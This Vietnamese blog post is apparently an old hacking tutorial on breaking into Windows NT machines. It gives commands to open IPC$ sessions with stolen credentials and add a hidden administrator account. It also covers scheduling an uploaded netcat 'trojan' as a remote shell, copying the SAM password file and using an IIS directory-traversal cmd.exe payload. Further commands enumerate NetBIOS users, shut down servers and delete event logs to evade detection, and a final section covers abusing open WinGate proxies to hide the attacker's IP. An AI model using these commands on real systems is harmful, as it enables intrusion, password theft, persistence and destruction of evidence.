Các lệnh cơ bản để xâm nhập máy tính( bài 1)

Bài Viết Chỉ Mang Tính Chất Tham Khảo
Phần 1 : Net

chỉ cần có được User và Passwords của một IP nào trên Net…thế là có thể kết nốii một IPC$ rồi đấy….bây giờ tui xin ví dụ là bạn có được User la Hateyvà passwords : 00000…IP : 127.0.0.1

Hãy mở trình Ms dos và gõ vào lệnh sau :

Net use \\127.0.0.1\ipc$ “00000″ /user:”hatey” đẩ kết nồi một IPC$ với máy victtim

nhưng thao tác tiếp theo..bạn nhất thiết phải login xong mới có thể sử dũng

bây giờ chúng ta nói tiếp làm thế nào để tạo một user mới …

chúng ta cộng thệm một user mới là yetah và password patfaq

Net user yetah patfaq/ add

nếu bạn thành công.thì có thể cộng user này vào nhom Adminstrator

Net Localgroup Adminstrator yetah/ add

trong phần này tớ hướng dẫn tạo một ổ đỉa Ảo trên computer

Net use z: \\127.0.0.1\C$ ( hoặc là IPC$ )

Z là của mình…còn C$ là của Victim

Phần 2 : AT

thường thường thì khi độp nhập vào máy tính..chúng ta sẻ tặng quà lưu niệm cho victim trước khi rút lui,….vậy khi copy trojan lên máy rồi…làm thế nào dể khới động nó đây ?

chúng ta phải dùng đến lệnh AT thủ xem….

đầu tiên…chúng ta cần biết thời gian của đối phương

Net time \\127.0.0.1

bây giờ thì nó sế phản hồi thời gian của victim…vd : 12:0 ..
tiếp theo..chúng ta cần tạo một homework ID = 1

AT \\127.0.0.1 12:3 nc.exe

ở đây giả thiết là tui có con trojan la Nc.exe và đã được copy lên máy victim rồi

* giới thiệu chút it về NC…NC là từ viết tắc của NETCAT….nó là một telnet server với port 99

đợi đến 12:3 là nó sế tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99..thế là xong phần lưu bút

phần 3 : Telnet

đây là một lệnh rất cần thiết khi xâm nhập máy tính…nó có thể kết nối vớ máy tính khắc từ xa..nhưng thường thi phải có I D & PW..nhưng nếu máy đã dzính đòn rồi thì bạn chỉ cần connected đến port 99 là ok

Telnet 127.0.0.1 99

thế là pồ đã kết nối đến port 99 và có thể thực hiện tất cả các lệnh…

Phần 4 : Copy

bây giờ chúng ta nói tiêp…làm thế nào để copy files trên máy mình lên máy victim và làm ngược lại….nhưng bạn phải có kết nối IPC$ cái đã….

chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1

Copy Index.html \\127.0.0.1\C$\index.html

nếu bạn copy lên folder winNt

Copy index.html \\127.0.0.1\admin$\index.html

muốn copy files trên máy victm thì bạn gõ vào :

Copy \\127.0.0.1\Admin$\repair\sam._c:\

phần 5 : Set

nếu bạn muốn hack một website……tất nhiến là phải mở port 80..nếu không thì hack cho ai xem ?

đã tới lúc dùng lệnh Set rồi

sau đây là kết quả mà tớ tìm thấy……chúng ta phân tích nghe….chủ yếu là muốn biêt homepage nó ở đâu thủ….

COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST= Dia chi IP cua Ta ở đây
ROIHTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot DAY LA URL CUA HOMEPAGEᅩ CHI CAN NHIN SAU DONG PATH_TRANSLATED= LA BIET NO O DAU 。O DAY LA E:\vlroot PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT

đây là cách rất ngu..nhưng chỉ có cách này mới 100% biết đuợc homepage tên gì..ở dâu? khi cậu Dir ..chắc chắn là sế View được rất nhiều files đấy`…..

phần 6 : Nbtstat

nếu cậu Scan đuợc một máy sữ dụng Winnt…open port 135-139…thế thì bồ phải dùng lệnh này để biết thêm user thôi

* tiện thể xin nói luôn..đây là netbios….sau khi có user rồi bạn có thể đoán mò password..nếu không thi Cracking luôn đi

Nbtstat - A XXX.XXX.XXX.XXX

sau đây là kết quả tớ scan được…..

NetBIOS Remote Machine Name Table

Name Type Status
———————————————
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII…<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP

kết quả cho biết User là PENTIUMIII

phần 7 : Shutdown

nhìn lệnh thôi cũng đủ biết rồi phải không ? đây là lệnh shutdown server Winnt

Shutdown \\127.0.0.1 t:20

20 giây sau…Winnt sế tự khời động lại…….hi vọng các bạn suy nghỉ kỷ trước khi dùng lệnh này….vì nó sế làm tổn thất rất nặng cho victim…hãy làm tay hacker có đạo đức

phần 8 : Dir….

lệnh này không có gì để nói hết..chỉ dùng để view thôi …………..

phần 9 : Del

lệnh này giống như xoá nhật kÿ vậy đó…..khi chúng ta xâm nhập máy tình…trên hệ thống sế lưu lại thông tin của chúng ta..vì thế..nên del nó đi…chư muốn bị tóm cổ hả ?

sau đây là những files nhật kÿ của Winnt

del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log

chỉ cần del hết là coi như xong 





Ngoài ra những lệnh trong ms dos còn rất nhiều….như lệnh ECHO …..FTP………ATTRIB……mà ở đây tui khÿng thể kể ra hết đươc

Wingate la gì, va nó liên quan gì tới server acttack?

WinGate là một chương trình đơn giản cho phép bạn chia các kết nối ra. Thí dụ: bạn có thể chia sẻ 1 modem với 2 máy.
WinGate dùng với nhiều proxy khách nhau có thể che giấu bạn.

2.> Mặc định sau khi cài đặt

Khi bạn cài WinGate bình thường, khÿng thay đổi thông số gì thì sế có một số mặc định:

Quote
Port | Service
23 Telnet Proxy Server - This is default and running right after install.
1080 SOCKS Server - This once setup via GateKeeper has no password until you set one.
6667 IRC Mapping - This once setup via GateKeeper has no password until you set one.

3. Port 23: Telnet Proxy

Proxy sế chạy ngay sau khi bạn hoàn thành cài đặt và làm mọi thứ trở nên tồi tệ nếu không có mật mã sau khi cài đặt và không đòi hỏi bạn là người duy nhất. Nhiều quản trị hệ thống không biết việc này và cũng khÿng nghĩ sế đặt mật mã cho nó và đây là nơi xuất hiện trục trặc.

Telnet proxy cũng thật sự đơn giản. Bạn telnet trên cổng 23 trên máy chủ chạy WinGate telnet proxy và bạn sế có dấu nhắc WinGate> Tại dấu nhắc này bạn đánh vào server, một khoảng trống và cổng bạn muốn kết nối vào.

Thí dụ:
Quote
telnet wingate.net
Connected to wingate.net

WinGate> victim.com 23

Thí dụ này cho thấy một ai đang dùng telnet vào WinGate server và sau đó từ WinGate server đó telnet tới victim.com vì vậy trên log của victim.com sế hiện ra IP của wingate (wingate.net) và vì vậy có thể giữ IP của mình bí mật.

4. Port 1080: SOCKS Proxy

Socks proxy không được cài đặt mặc định nhưng ngay sau khi dùng GateKeeper sế cài đặt nó. Việc cài đặt này khÿng cần password, trừ khi bạn có đặt. Nếu bạn quen với socks bạn có thể biết nhiều việc có thể làm với nó.

5. Port 6667: IRC Proxy

IRC proxy cũng giống như khi chúng ta dùng wingate telnet proxy bounce tới irc server trừ khi irc proxy đã được thiết lập để đến một server. Nó khÿng được thiết lập để chạy sau khi cài đặt nhưng sau khi bạn cài sế khÿng cần password, trừ khi bạn có đặt.

6. Làm thế nào để tìm và sử dụng WinGate?

Tìm WinGates cũng rất dễ làm. Nếu bạn muốn tìm IP WinGates tĩnh (IP khÿng đổi) thì đến yahoo hay một trang tìm kiếm cable modem. Tìm kiếm cable modems vì nhiều người dùng cable modems có WinGate để họ có thể chia sẻ đường truyền rộng của nó cable modems cho những máy khác trong nhà. Một cÿng ty cable modem lớn là Cox Cable. Trang web của họ có thể tìm thấy ở http://www.home.com. The Cox Cable có IP trong khoảng 24.1.X.X.
Bạn có thể dùng Port hay Domain scanners và scan Port 1080, tên gọi là SOCKS Proxy, đây cũng là một cách đơn giản để tìm WinGate.

Thí dụ:
24.1.67.1 chỉ đến c224084-a.frmt1.sfba.home.com mà tại đó chúng ta biết sfba = San Fransico Bay Area hay cái gì gần như vậy.
Đó là cách tìm IP WinGates tĩnh. Để tìm IP động (IP thay đổi mỗi lần user kết nối vào internet) của WinGates cũng khÿng khó chút nàol. Hầu hết tất cả ISP lớn và nhỏ đều có user dùng WinGate. Bạn cần phải biết định dạng của ISP’s dynamic ppp addresses hoặc bạn có thể dùng IRC (Internet Relay Chat). Giả sử bạn có ppp IP của armory-us832.javanet.com. Bây giờ bạn dns IP đó và có 209.94.151.143. Bây giờ lấy IP đó và đưa nó vào domain scanner program.

Thí dụ: Domscan có thể tìm thấy tại Rhino9 web site (rhino9.abyss.com). Ok, bây giờ bạn đã có domscan. Chạy domscan và có một box để đặt IP và port để scan. WinGate telnet proxy theo mặc định chạy trên cổng 23. Vì vật đặt 209.94.151.143 vào trong box đầu tiên trong domscan và 23 trong box thứ 2, sau đó click vào start. Ta có được kết quả:

209.94.151.2
209.94.151.4
209.94.151.6
209.94.151.10
209.94.151.8
209.94.151.73
209.94.151.118
209.94.151.132

Bây giờ kiểm tra từng cái để tìm WinGate prompt. Để làm vật ta intelnet tới 209.94.151.2 trên cổng 23 và nếu nó hiện WinGate> khi chúng ta kết nối thì nó là WinGate. Nếu khÿng chúng ta làm tiếp địa chỉ kế tiếp có thể là 209.94.151.4. Chúng ta làm như vậy cho đến hết danh sách IP.

Ghi chú: Nếu chúng ta scan dynamic IP WinGates nếu số cuối cùng của IP càng lớn thì hy vọng nó là IP của WinGate càng lớn. Thí dụ: Cơ hội 209.94.151.132 là WinGate lớn hơn 209.94.151.2.

Bài viết chỉ mang tính chất tham khảo

Nhận xét

Bài đăng phổ biến từ blog này

Hướng dẫn sử dụng cài đặt và cấu hình Surfcontrol for ISA dùng Monitor Website

Hiren's BootCD 12.0 Link down MediaFire mới